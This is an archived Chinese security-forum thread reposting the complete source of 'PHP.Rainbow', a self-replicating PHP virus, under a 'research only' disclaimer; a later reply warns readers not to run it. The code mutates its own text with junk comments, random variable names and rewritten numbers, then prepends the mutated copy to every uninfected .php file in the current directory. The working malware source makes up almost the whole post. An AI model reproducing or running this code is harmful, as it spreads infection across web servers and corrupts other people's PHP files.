邪恶八进制信息安全团队技术讨论组's Archiver

amxku 2006-8-14 08:05

[转载]PHP病毒PHP.Rainbow

信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])


[探讨 研究 病毒] PHP病毒PHP.Rainbow

  没有看说明之前,不要擅自测试;

  特别声明:本帖只为探讨和研究,由此帖所导致的任何人为和非人为的后果,与HonestQiao均不存在任何物质的精神的关联,HonestQiao对此不负任何责任。 与我amxku也没有关系哈,哈哈!
[language=php]<?php // RainBow
srand((double)microtime() * 1000000);
$changevars = array(&#39;changevars&#39;, &#39;string&#39;, &#39;newcont&#39;,
   &#39;curdir&#39;, &#39;filea&#39;, &#39;victim&#39;, &#39;viccont&#39;, &#39;newvars&#39;, &#39;returnvar&#39;,
   &#39;counti&#39;, &#39;countj&#39;, &#39;trash&#39;, &#39;allcont&#39;, &#39;number&#39;, &#39;remn&#39;);
$string = strtok(fread(fopen(__FILE__, &#39;r&#39;), filesize(__FILE__)), chr(13) . chr(10));
$newcont = &#39;<?php // RainBow&#39; . chr(13) . chr(10);
while ($string && $string != &#39;?>&#39;){
   if(rand(0, 1)){
     if(rand(0, 1)){
         $newcont .= &#39;// &#39; . trash(&#39;&#39;, 0) . chr(13) . chr(10);
     }
     if(rand(0, 1)){
         $newcont .= &#39;$&#39; . trash(&#39;&#39;, 0) . &#39;=&#39; . chr(39) . trash(&#39;&#39;, 0) . chr(39) . &#39;;&#39; . chr(13) . chr(10);
     }
     if(rand(0, 1)){
         $newcont .= &#39;$&#39; . trash(&#39;&#39;, 0) . &#39;=&#39; . rand() . &#39;;&#39; . chr(13) . chr(10);
     }
   }
   $string = strtok(chr(13) . chr(10));
   if($string{0} != &#39;/&#39; && $string{0} != &#39;$&#39;){
     $newcont .= $string . chr(13) . chr(10);
   }
}
$counti = 0;
while($changevars[$counti]){
   $newcont = str_replace($changevars[$counti++], trash(&#39;&#39;, 0), $newcont);
}
$countj = -1;
$number = &#39;&#39;;
while(++$countj < strlen($newcont)){
   if (ord($newcont{$countj}) > 47 && ord($newcont{$countj}) < 58){
     $number = $newcont{$countj};
     while(ord($newcont{++$countj}) > 47 && ord($newcont{$countj}) < 58){
         $number .= $newcont{$countj};
     }
     $remn = rand(1, 10);
     if (!rand(0, 5)){
         switch(rand(1, 3)){
         case 1:$allcont .= &#39;(&#39; . ($number - $remn) . &#39;+&#39; . $remn . &#39;)&#39;;
           break;
         case 2:$allcont .= &#39;(&#39; . ($number + $remn) . &#39;-&#39; . $remn . &#39;)&#39;;
           break;
         case 3:$allcont .= &#39;(&#39; . ($number * $remn) . &#39;/&#39; . $remn . &#39;)&#39;;
           break;
         }
     }else{
         $allcont .= $number;
     }
   }
   $allcont .= $newcont{$countj};
   $number = &#39;&#39;;
}
$curdir = opendir(&#39;.&#39;);
while($filea = readdir($curdir)){
   if(strstr($filea, &#39;.php&#39;)){
     $victim = fopen($filea, &#39;r+&#39;);
     if (!strstr(fread($victim, 25), &#39;RainBow&#39;)){
         rewind($victim);
         $viccont = fread($victim, filesize($filea));
         rewind($victim);
         fwrite($victim, $allcont . $viccont);
     }
     fclose($victim);
   }
}
closedir($curdir);
function trash($returnvar, $countj){
   do{
     $returnvar .= chr(rand(97, 122));
   }while($countj++ < rand(5, 15));
   return $returnvar;
}
?>
[/language]

bink 2007-3-29 13:06

怕怕...DIR.....

偶也附加一句...千万不要随便运行该代码....

页: [1]
© 1999-2008 EvilOctal Security Team